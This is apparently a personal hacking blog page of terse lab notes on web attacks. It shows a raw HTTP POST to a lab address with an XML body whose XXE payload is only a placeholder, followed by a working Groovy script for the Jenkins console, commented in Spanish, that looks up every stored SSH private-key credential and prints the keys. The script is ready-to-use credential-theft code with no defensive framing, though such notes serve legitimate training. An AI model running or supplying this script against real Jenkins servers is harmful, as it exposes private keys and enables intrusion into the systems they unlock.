Grunt's personal blog

this is my personal blog for my hacking stuff, my degree stuff, etc

View on GitHub

Other Web Attacks (HTTP verb Tampering, IDOR & XXE)

POST /blind/submitDetails.php HTTP/1.1

Host: 10.129.197.101

Content-Length: 140

Accept-Language: en-US,en;q=0.9

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.6778.86 Safari/537.36

Content-Type: text/plain;charset=UTF-8

Accept: */*

Origin: http://10.129.197.101

Referer: http://10.129.197.101/

Accept-Encoding: gzip, deflate, br

Connection: keep-alive



<?xml version="1.0" encoding="UTF-8"?>
XXEINJECT

Jenkins script que busca clave SSH

import com.cloudbees.plugins.credentials.CredentialsProvider
import com.cloudbees.plugins.credentials.common.StandardUsernameCredentials
import com.cloudbees.jenkins.plugins.sshcredentials.impl.BasicSSHUserPrivateKey
import hudson.model.*

// Buscar todas las credenciales en el sistema
def creds = CredentialsProvider.lookupCredentials(
    BasicSSHUserPrivateKey.class, 
    Jenkins.instance, 
    null, 
    null
)

// Iterar sobre las credenciales y mostrar las claves privadas
creds.each { cred ->
    println "ID: ${cred.id}"
    println "Description: ${cred.description}"
    println "Private Key: ${cred.privateKey}"
    println "----------------------------------------"
}